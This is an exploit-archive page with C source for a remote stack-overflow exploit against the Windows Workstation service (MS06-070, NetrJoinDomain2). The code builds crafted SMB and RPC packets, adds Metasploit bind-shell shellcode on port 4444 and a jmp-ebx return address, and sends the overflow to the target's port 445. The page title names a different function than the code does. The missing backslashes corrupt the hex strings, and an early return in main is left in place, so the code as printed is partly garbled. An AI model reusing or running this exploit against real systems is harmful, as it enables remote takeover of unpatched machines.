[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)
# Published : 2006-11-16
# Author : cocoruder
# Previous Title : MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)
# Next Title : WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Exploit
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
successfully test on Windows 2000 Server SP4(chinese)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
unsigned char SmbNeg[] =
"x00x00x00x2fxffx53x4dx42x72x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
"x20x4cx4dx20x30x2ex31x32x00";
unsigned char Session_Setup_AndX_Request[]=
"x00x00x00x48xffx53x4dx42x73x00"
"x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
"xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
"x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
"x62x00";
unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";
unsigned char NTCreate_AndX_Request[]=
"x00x00x00x64xffx53x4dx42xa2x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
"x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
"x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
"x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";
unsigned char Rpc_Bind_Wkssvc[]=
"x00x00x00x92xffx53x4dx42x25x00"
"x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
"x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
"x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
"x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
"x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
"x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
"xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
"x9fxe8x08x00x2bx10x48x60x02x00x00x00";
unsigned char Rpc_NetrJoinDomain2_Header[]=
"x00x00x00xa8xffx53x4dx42x25x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
"x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
"x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
"x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
"x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
"x00x00x00x00"
"x16x00" //opnum,NetrJoinDomain2
"x30x2ax42x00"
"x0ex00x00x00"
"x00x00x00x00"
"x0ex00x00x00"
"x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
"x00x00"
"x10x01x00x00"
"x00x00x00x00"
"x10x01x00x00";
unsigned char Rpc_NetrJoinDomain2_End[]=
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x01x00x00x00";
unsigned char *lpDomainName=NULL;
DWORD dwDomainNameLen=0;
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com */
unsigned char shellcode[] =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x6e"
"xd2x50xd3x83xebxfcxe2xf4x92xb8xbbx9ex86x2bxafx2c"
"x91xb2xdbxbfx4axf6xdbx96x52x59x2cxd6x16xd3xbfx58"
"x21xcaxdbx8cx4exd3xbbx9axe5xe6xdbxd2x80xe3x90x4a"
"xc2x56x90xa7x69x13x9axdex6fx10xbbx27x55x86x74xfb"
"x1bx37xdbx8cx4axd3xbbxb5xe5xdex1bx58x31xcex51x38"
"x6dxfexdbx5ax02xf6x4cxb2xadxe3x8bxb7xe5x91x60x58"
"x2exdexdbxa3x72x7fxdbx93x66x8cx38x5dx20xdcxbcx83"
"x91x04x36x80x08xbax63xe1x06xa5x23xe1x31x86xafx03"
"x06x19xbdx2fx55x82xafx05x31x5bxb5xb5xefx3fx58xd1"
"x3bxb8x52x2cxbexbax89xdax9bx7fx07x2cxb8x81x03x80"
"x3dx81x13x80x2dx81xafx03x08xbax41x8fx08x81xd9x32"
"xfbxbaxf4xc9x1ex15x07x2cxb8xb8x40x82x3bx2dx80xbb"
"xcax7fx7ex3ax39x2dx86x80x3bx2dx80xbbx8bx9bxd6x9a"
"x39x2dx86x83x3ax86x05x2cxbex41x38x34x17x14x29x84"
"x91x04x05x2cxbexb4x3axb7x08xbax33xbexe7x37x3ax83"
"x37xfbx9cx5ax89xb8x14x5ax8cxe3x90x20xc4x2cx12xfe"
"x90x90x7cx40xe3xa8x68x78xc5x79x38xa1x90x61x46x2c"
"x1bx96xafx05x35x85x02x82x3fx83x3axd2x3fx83x05x82"
"x91x02x38x7exb7xd7x9ex80x91x04x3ax2cx91xe5xafx03"
"xe5x85xacx50xaaxb6xafx05x3cx2dx80xbbx9ex58x54x8c"
"x3dx2dx86x2cxbexd2x50xd3";
DWORD fill_len_1 =0x84c; //fill data
DWORD fill_len_2 =0x1000; //fill rubbish data
DWORD addr_jmp_ebx=0x77f81573; //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[]= //jmp 8
"xEBx06x90x90";
unsigned char *Rpc_NetrJoinDomain2=NULL;
DWORD dwRpc_NetrJoinDomain2=0;
unsigned char recvbuff[2048];
void showinfo(void)
{
printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn");
printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n");
printf("page:http://ruder.cdut.net/default.aspnn");
printf("successfully test on Windows 2000 Server SP4(chinese)nn");
printf("usage:n");
printf("ms06070 targetip DomainNamenn");
printf("notice:n");
printf("Make sure the DomainName is valid and live,more informations
seen");
printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n");
printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn");
}
void neg ( int s )
{
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}
void MakeAttackPacket(char *lpDomainNameStr)
{
DWORD j,len,b_flag;
dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
memset(lpDomainName,0,dwDomainNameLen);
MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
*(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
*(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
len=dwDomainNameLen+ //DomainName
fill_len_1-3*2+ //fill_len_1
4+ //jmp 8
4+ //addr jmp ebx
sizeof(shellcode)-1+ //shellcode
fill_len_2+ //fill_len_2
2; //0x0000
b_flag=0;
if (len%2==1)
{
len++;
b_flag=1;
}
dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
len+
sizeof(Rpc_NetrJoinDomain2_End)-1; //end
//malloc
Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
if (Rpc_NetrJoinDomain2==NULL)
{
printf("malloc error!n");
return;
}
//fill nop
memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//update para1 length
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
//copy header
memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//copy DomainName
memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
j=j+dwDomainNameLen;
//calculate offset
j=j+fill_len_1-3*2;
//jmp 8
memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
j=j+4;
//jmp ebx address
*(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
j=j+4;
//copy shellcode
memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
j=j+sizeof(shellcode)-1;
//fill data
memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
j=j+fill_len_2;
//0x0000(NULL)
if (b_flag==0)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
j=j+2;
}
else if (b_flag==1)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
Rpc_NetrJoinDomain2[j+2]=0x00;
j=j+3;
}
//copy other parameter
memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
}
void main(int argc,char **argv)
{
WSADATA ws;
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WORD userid,treeid,fid;
showinfo();
return;
WSAStartup(MAKEWORD(2,2),&ws);
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((USHORT)445);
printf("[+] Connecting %sn",argv[1]);
ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("connect error!n");
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(WORD *)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(WORD *)(recvbuff+0x1c); //get treeid
//send NTCreate_AndX_Request
memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid
ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
if (ret<=0)
{
printf("send NTCreate_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
fid=*(WORD *)(recvbuff+0x2a); //get fid
//rpc bind
memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
*(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
if (ret<=0)
{
printf("send Rpc_Bind_Wkssvc error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
MakeAttackPacket((char *)argv[2]);
memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
*(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
*(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
*(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length
ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
if (ret<=0)
{
printf("send Rpc_NetrJoinDomain2 error!n");
return;
}
printf("[+] Send attack packet successfully.telnet %s:4444?n",argv[1]);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
closesocket(sock);
}
// www.Syue.com [2006-11-16]